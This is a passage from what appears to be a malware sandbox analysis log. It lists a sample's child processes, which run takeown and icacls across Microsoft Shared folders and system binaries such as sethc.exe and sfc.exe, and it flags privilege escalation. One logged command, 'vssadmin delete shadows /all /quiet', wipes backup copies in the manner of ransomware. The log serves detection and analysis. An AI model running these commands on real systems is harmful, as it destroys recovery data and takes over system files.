  - Suspicious use of AdjustPrivilegeToken
  PID:2688
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\el-GR" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:552
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\perfmon.msc" /grant Administrators:F
  2⤵
  PID:1784
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\el-GR" /grant Administrators:F
  2⤵
  PID:1252
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\en-US" /a
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:1516
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US" /grant Administrators:F
  2⤵
  PID:1940
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\es-ES" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1588
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\es-ES" /grant Administrators:F
  2⤵
  PID:2104
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\et-EE" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1044
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\resmon.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2652
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\et-EE" /grant Administrators:F
  2⤵
  PID:892
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\resmon.exe" /grant Administrators:F
  2⤵
  PID:2144
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fi-FI" /a
  2⤵
  PID:3020
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fi-FI" /grant Administrators:F
  2⤵
  PID:2836
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2660
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR" /grant Administrators:F
  2⤵
  PID:1704
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2932
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions" /grant Administrators:F
  2⤵
  PID:2740
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad" /a
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:2860
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\sethc.exe" /a
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:2876
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad" /grant Administrators:F
  2⤵
  PID:596
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\sethc.exe" /grant Administrators:F
  2⤵
  PID:2768
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2364
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad" /grant Administrators:F
  2⤵
  PID:2420
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2756
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main" /grant Administrators:F
  2⤵
  PID:2704
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1764
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers" /grant Administrators:F
  2⤵
  PID:2676
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\taskkill.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1664
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu" /a
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:1204
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:1168
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\taskkill.exe" /grant Administrators:F
  2⤵
  PID:2316
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2516
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad" /grant Administrators:F
  2⤵
  PID:2800
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1640
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred" /grant Administrators:F
  2⤵
  PID:932
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\sfc.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2424
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols" /a
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:1792
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\sfc.exe" /grant Administrators:F
  2⤵
  PID:2320
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols" /grant Administrators:F
  2⤵
  PID:684
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1568
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web" /grant Administrators:F
  2⤵
  PID:1336
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\he-IL" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:716
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\he-IL" /grant Administrators:F
  2⤵
  PID:2484
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2772
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR" /grant Administrators:F
  2⤵
  PID:1628
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\rundll32.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2148
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\hu-HU" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2004
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\rundll32.exe" /grant Administrators:F
  2⤵
  PID:1828
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\hu-HU" /grant Administrators:F
  2⤵
  PID:2044
- C:\windows\system32\vssadmin.exe
  "C:\windows\system32\vssadmin.exe" delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:1676
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\HWRCustomization" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2284
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\HWRCustomization" /grant Administrators:F
  2⤵
  PID:2832
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\it-IT" /a
  2⤵
  PID:2972
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\it-IT" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1704
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP" /a
  2⤵
  PID:2836
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP" /grant Administrators:F
  2⤵
  PID:2984
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR" /a
  2⤵
  PID:1116
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR" /grant Administrators:F
  2⤵
  PID:1592
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT" /a
  2⤵
  PID:2876
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:1332
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV" /a
  2⤵
  PID:2088
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV" /grant Administrators:F
  2⤵
  PID:2820
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO" /a
  2⤵
  PID:1668
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO" /grant Administrators:F
  2⤵
  PID:2564
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL" /a
  2⤵
  - Possible privilege escalation attempt
  PID:1052
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL" /grant Administrators:F
  2⤵
  PID:1276
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL" /a
  2⤵
  - Possible privilege escalation attempt
  PID:868
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL" /grant Administrators:F
  2⤵
  PID:1708
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR" /a
  2⤵
  PID:2416
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR" /grant Administrators:F
  2⤵
  PID:2252
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT" /a
  2⤵
  PID:2304
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT" /grant Administrators:F
  2⤵
  PID:2020
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\ro-RO" /a
  2⤵
  PID:2372
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\ro-RO" /grant Administrators:F
  2⤵
  PID:268
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU" /a
  2⤵
  PID:1656
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:1040
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK" /a
  2⤵
  PID:468
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK" /grant Administrators:F
  2⤵
  PID:2800
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI" /a
  2⤵
  PID:2676
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI" /grant Administrators:F
  2⤵
  PID:604
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\sr-Latn-CS" /a
  2⤵
  PID:1172
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\sr-Latn-CS" /grant Administrators:F
  2⤵
  PID:1788
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE" /a
  2⤵
  PID:1628
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE" /grant Administrators:F
  2⤵
  PID:1084
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\th-TH" /a
  2⤵
  PID:976
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\th-TH" /grant Administrators:F
  2⤵
  PID:1952
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR" /a
  2⤵
  - Modifies file permissions
  PID:2552
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR" /grant Administrators:F
  2⤵
  PID:2004
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\uk-UA" /a
  2⤵
  - Possible privilege escalation attempt
  PID:1392
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\uk-UA" /grant Administrators:F
  2⤵
  PID:2104
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN" /a
  2⤵
  - Possible privilege escalation attempt
  PID:3020
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN" /grant Administrators:F
  2⤵
  PID:2748
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW" /a
  2⤵
  PID:2432
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW" /grant Administrators:F
  2⤵
  PID:2880
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\MSInfo" /a
  2⤵
  PID:2948
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\MSInfo" /grant Administrators:F
  2⤵
  PID:2836
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\MSInfo\msinfo32.exe" /a
  2⤵
  PID:2780
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\MSInfo\msinfo32.exe" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:2820
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\MSInfo\de-DE" /a
  2⤵
  PID:1956
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\MSInfo\de-DE" /grant Administrators:F
  2⤵
  PID:1728
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US" /a
  2⤵
  PID:1724
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US" /grant Administrators:F
  2⤵
  PID:792
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\MSInfo\es-ES" /a
  2⤵
  PID:1660
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\MSInfo\es-ES" /grant Administrators:F
  2⤵
  PID:1340
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\MSInfo\fr-FR" /a
  2⤵
  PID:1036
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\MSInfo\fr-FR" /grant Administrators:F
  2⤵
  PID:1772
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\MSInfo\it-IT" /a
  2⤵
  PID:1380
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\MSInfo\it-IT" /grant Administrators:F
  2⤵
  PID:2640
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\MSInfo\ja-JP" /a
  2⤵
  PID:2204
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\MSInfo\ja-JP" /grant Administrators:F
  2⤵
  PID:1880
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\OFFICE14" /a
  2⤵
  PID:2064
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\OFFICE14" /grant Administrators:F
  2⤵
  PID:1584
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /a
  2⤵
  - Possible privilege escalation attempt
  PID:2052
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /grant Administrators:F
  2⤵
  PID:2036
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures" /a
  2⤵
  PID:2784
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:2308
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform" /a
  2⤵
  - Modifies file permissions
  PID:1384
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform" /grant Administrators:F
  2⤵
  PID:976
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE" /a
  2⤵
  - Possible privilege escalation attempt
  PID:2668
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE" /grant Administrators:F
  2⤵
  PID:1704
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\Stationery" /a
  2⤵
  PID:2708
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\Stationery" /grant Administrators:F
  2⤵
  PID:2944
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\TextConv" /a
  2⤵
  - Possible privilege escalation attempt
  PID:2444
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\TextConv" /grant Administrators:F
  2⤵
  PID:2652
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\TextConv\de-DE" /a
  2⤵
  PID:2432
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\TextConv\de-DE" /grant Administrators:F
  2⤵
  PID:1840
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\TextConv\en-US" /a
  2⤵
  PID:216
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\TextConv\en-US" /grant Administrators:F
  2⤵
  PID:2632
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\TextConv\es-ES" /a
  2⤵
  PID:2588
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\TextConv\es-ES" /grant Administrators:F
  2⤵
  PID:2796
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\TextConv\fr-FR" /a
  2⤵
  PID:856
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\TextConv\fr-FR" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:2756
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\TextConv\it-IT" /a
  2⤵
  - Modifies file permissions
  PID:1348
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\TextConv\it-IT" /grant Administrators:F
  2⤵
  PID:1712
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\TextConv\ja-JP" /a
  2⤵
  PID:2604
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\TextConv\ja-JP" /grant Administrators:F
  2⤵
  PID:1728
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\Triedit" /a
  2⤵
  PID:868
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\Triedit" /grant Administrators:F
  2⤵
  PID:1556
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\Triedit\de-DE" /a
  2⤵
  - Modifies file permissions
  PID:2888
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\Triedit\de-DE" /grant Administrators:F
  2⤵
  PID:2512
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\Triedit\en-US" /a
  2⤵
  PID:716
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\Triedit\en-US" /grant Administrators:F
  2⤵
  PID:1568
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\Triedit\es-ES" /a
  2⤵
  PID:1764
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\Triedit\es-ES" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:3000
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\Triedit\fr-FR" /a
  2⤵
  PID:268
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\Triedit\fr-FR" /grant Administrators:F
  2⤵
  PID:1496
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\Triedit\it-IT" /a
  2⤵
  PID:2292
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\Triedit\it-IT" /grant Administrators:F
  2⤵
  PID:792
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\Triedit\ja-JP" /a
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:1772
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\Triedit\ja-JP" /grant Administrators:F
  2⤵
  PID:1308
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\VC" /a
  2⤵
  PID:1508
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\VC" /grant Administrators:F
  2⤵
  PID:896
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\VGX" /a
  2⤵
  - Modifies file permissions
  PID:2556
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\VGX" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:2044
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\VSTO" /a
  2⤵
  PID:2384
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\VSTO" /grant Administrators:F
  2⤵
  PID:2964
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0" /a
  2⤵
  PID:572
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:1576
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe" /a
  2⤵
  - Modifies file permissions
  PID:2760
- C:\windows\system32\icacls.exe
